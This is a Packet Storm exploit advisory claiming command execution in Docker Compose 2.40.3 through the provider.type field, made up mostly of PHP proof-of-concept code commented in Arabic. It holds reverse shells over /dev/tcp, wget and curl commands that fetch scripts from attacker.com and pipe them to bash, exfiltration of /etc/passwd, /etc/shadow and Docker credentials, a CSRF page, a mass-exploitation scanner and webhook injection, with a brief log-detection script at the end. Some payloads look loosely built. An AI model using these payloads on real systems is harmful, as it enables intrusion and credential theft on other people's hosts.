PACKETSTORM

📄 Docker Compose 2.40.3 Command Execution_PACKETSTORM:212819

December 15, 2025 invoker category_exploit

Description

Docker Compose version 2.40.3 proof of concept provider type PHP command execution exploit...
Visit Original Source

Basic Information

ID PACKETSTORM:212819
Published Dec 15, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Docker Compose v 2.40.3 Provider Type PHP Command Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://docs.docker.com/compose/releases/prior-releases/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212673/ &

[+] Summary : Docker Compose Provider Type Command Execution is a critical vulnerability (CVE pending) that allows arbitrary command execution
on the host system when processing Docker Compose files containing the provider.type field. This vulnerability exists due to Docker
Compose's design to execute any specified provider type as a binary or script on the host without proper validation or isolation.

[+] POC :

1. Creating malicious files via PHP

Example: A PHP page generates malicious Docker Compose files

<?php
// exploit-docker-compose.php
if (isset($_GET['cmd'])) {
$cmd = base64_decode($_GET['cmd']);

// إنشاء محتوى docker-compose.yml
$composeContent = <<<YAML
services:
exploit:
provider:
type: /bin/sh
command: -c "{$cmd}"
YAML;

// إنشاء محتوى البروفايدر المزيف (لطرق بديلة)
$scriptContent = "#!/bin/sh\n{$cmd}\n";

header('Content-Type: text/plain');
echo $composeContent;
exit;
}

// أو حفظ الملف على الخادم
if (isset($_POST['save_exploit'])) {
$composeContent = <<<YAML
services:
backdoor:
provider:
type: /tmp/exploit.sh
YAML;

$scriptContent = "#!/bin/sh\nbash -i >& /dev/tcp/{$_POST['lhost']}/{$_POST['lport']} 0>&1 &\n";

file_put_contents('/tmp/docker-compose.yml', $composeContent);
file_put_contents('/tmp/exploit.sh', $scriptContent);
chmod('/tmp/exploit.sh', 0755);

echo "Files created!";
}
?>

Exploiting platforms that allow uploading Docker Compose files

Example: Exploiting a control panel that allows uploading YAML files

<?php
// file-upload-exploit.php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['dockerfile'])) {
$uploadDir = '/var/www/uploads/';
$composeFile = $uploadDir . basename($_FILES['dockerfile']['name']);

// تحقق بسيط للملف (يمكن تجاوزه)
if (move_uploaded_file($_FILES['dockerfile']['tmp_name'], $composeFile)) {

// محتوى ضار داخل ملف compose
$maliciousContent = <<<YAML
services:
app:
image: nginx
provider:
type: /bin/sh
command: -c "wget http://attacker.com/backdoor.sh -O /tmp/bd.sh && chmod +x /tmp/bd.sh && /tmp/bd.sh"

db:
image: mysql
environment:
MYSQL_ROOT_PASSWORD: $(curl http://attacker.com/steal.php?data=$(cat /etc/passwd|base64))
YAML;

file_put_contents($composeFile, $maliciousContent);

// محاولة تشغيل docker compose (إذا كانت الصلاحيات تسمح)
if (isset($_POST['auto_run'])) {
$output = shell_exec("cd $uploadDir && docker compose up -d 2>&1");
echo "<pre>Output: $output</pre>";
}
}
}
?>

<form method="POST" enctype="multipart/form-data">
Upload Docker Compose: <input type="file" name="dockerfile">
<br>
Auto-run: <input type="checkbox" name="auto_run">
<br>
<input type="submit" value="Upload">
</form>

3. Exploiting API endpoints that interact with Docker

Example: Injecting commands into an API that manages Docker containers

<?php
// api-exploit.php

// محاكاة endpoint لـ Docker API
if (isset($_POST['compose_config'])) {
$config = json_decode($_POST['compose_config'], true);

// نقطة الضعف: عدم التحقق من provider.type
$yamlContent = yaml_emit($config);

// حفظ الملف المؤقت
$tempFile = tempnam('/tmp', 'docker_');
file_put_contents($tempFile, $yamlContent);

// تنفيذ الأمر (مع صلاحيات)
$output = shell_exec("docker compose -f $tempFile up 2>&1");

// تنظيف (قد لا ينفذ إذا فشل الأمر)
unlink($tempFile);

echo json_encode(['output' => $output]);
exit;
}

// payload للاستغلال
$payload = [
'services' => [
'malicious' => [
'provider' => [
'type' => '/bin/sh'
],
'command' => '-c "echo pwned > /tmp/hacked && cat /etc/shadow | base64 > /tmp/stolen"'
]
]
];

// إرسال الهجوم
$ch = curl_init('http://target.com/api/docker/deploy');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'compose_config' => json_encode($payload)
]);
$response = curl_exec($ch);
curl_close($ch);

echo "Attack sent!";
?>

4. CSRF + Docker Compose Exploit

Example: Exploiting CSRF in the Docker Administrator Interface

<?php
// csrf-exploit.html (يتم رفعه على خادم المهاجم)
?>
<html>
<body>
<script>
// CSRF لاستغلال Docker Compose
fetch('http://victim.com/docker/deploy', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify({
name: 'innocent-app',
compose: `services:
innocent:
image: nginx
provider:
type: /bin/bash
command: -c "curl http://attacker.com/steal.sh | bash"

backup:
image: busybox
command: sh -c "cat /var/lib/docker/config.json | base64 | curl -X POST -d @- http://attacker.com/log"`
})
});
</script>
<img src="http://victim.com/docker/deploy?action=up&file=http://attacker.com/malicious-compose.yml" onload="alert('Exploited')">
</body>
</html>

5. Mass Exploitation Scanner

A scanner for searching for servers vulnerable to the exploit.

<?php
// docker-scanner.php
class DockerComposeScanner {
private $targets = [];

public function addTarget($url) {
$this->targets[] = $url;
}

public function scan() {
foreach ($this->targets as $target) {
$this->testVulnerability($target);
}
}

private function testVulnerability($url) {
// اختبار 1: رفع ملف مباشر
$testCompose = tempnam(sys_get_temp_dir(), 'test_');
$maliciousContent = <<<YAML
services:
test:
provider:
type: /bin/echo
command: VULNERABLE
YAML;

file_put_contents($testCompose, $maliciousContent);

// محاولة رفع إلى الهدف
$ch = curl_init($url . '/upload');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'file' => new CURLFile($testCompose, 'text/yaml', 'docker-compose.yml')
]);
$response = curl_exec($ch);

if (strpos($response, 'VULNERABLE') !== false) {
$this->log("VULNERABLE: $url");
$this->exploit($url);
}

unlink($testCompose);
}

private function exploit($url) {
// تنفيذ استغلال كامل
$reverseShell = base64_encode('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1');

$payload = [
'compose' => <<<YAML
services:
exploit:
provider:
type: /bin/bash
command: -c "echo $reverseShell | base64 -d | bash"
YAML
];

// إرسال Payload
$ch = curl_init($url . '/api/deploy');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_exec($ch);
}

private function log($message) {
file_put_contents('scan.log', date('Y-m-d H:i:s') . " - $message\n", FILE_APPEND);
echo "$message\n";
}
}

// الاستخدام
$scanner = new DockerComposeScanner();
$scanner->addTarget('http://target1.com');
$scanner->addTarget('http://target2.com');
$scanner->scan();
?>

6. Webhook Exploitation

Exploiting webhooks that launch Docker Compose

<?php
// webhook-exploit.php
// معالجة webhook من GitHub/GitLab/etc

$payload = json_decode(file_get_contents('php://input'), true);

if (isset($payload['ref'])) {
// محاكاة سكربت النشر
$repoUrl = $payload['repository']['clone_url'];

// استنساخ المستودع (قد يحتوي على ملفات ضارة)
$cloneDir = '/tmp/repo_' . uniqid();
shell_exec("git clone $repoUrl $cloneDir");

// تشغيل docker compose إذا وجد
if (file_exists("$cloneDir/docker-compose.yml")) {
// تنفيذ الأمر الضار
shell_exec("cd $cloneDir && docker compose up -d");

// تنظيف (قد يفشل إذا كان هناك عملية خلفية)
shell_exec("rm -rf $cloneDir");
}

// أو حقن ملف ضار
$injectedCompose = <<<YAML
services:
web:
image: nginx
provider:
type: /bin/sh
command: -c "curl http://attacker.com/c2.php?host=$(hostname) | bash"
YAML;

file_put_contents("$cloneDir/docker-compose.yml", $injectedCompose);
shell_exec("cd $cloneDir && docker compose up");
}
?>

Attack detection
PHP detection system:

<?php
// intrusion-detection.php
class DockerIntrusionDetection {
public static function monitor() {
$logs = [
'/var/log/docker.log',
'/var/log/syslog',
'/var/log/auth.log'
];

$patterns = [
'/provider\.type.*(\/bin\/|\/tmp\/|\/dev\/)/',
'/docker compose.*(curl|wget|bash|sh).*(attacker|exploit)/i',
'/execution.*(compose|docker).*(provider|type)/i'
];

foreach ($logs as $log) {
if (file_exists($log)) {
$content = file_get_contents($log);
foreach ($patterns as $pattern) {
if (preg_match($pattern, $content)) {
self::alert($pattern, $log);
}
}
}
}
}

private static function alert($pattern, $log) {
$message = "DOCKER EXPLOIT DETECTED!\n";
$message .= "Pattern: $pattern\n";
$message .= "Log file: $log\n";
$message .= "Time: " . date('Y-m-d H:i:s') . "\n";

// إرسال تنبيه
mail('[email protected]', 'Security Alert - Docker Exploit', $message);
syslog(LOG_ALERT, $message);
}
}

// تشغيل المراقبة
DockerIntrusionDetection::monitor();
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.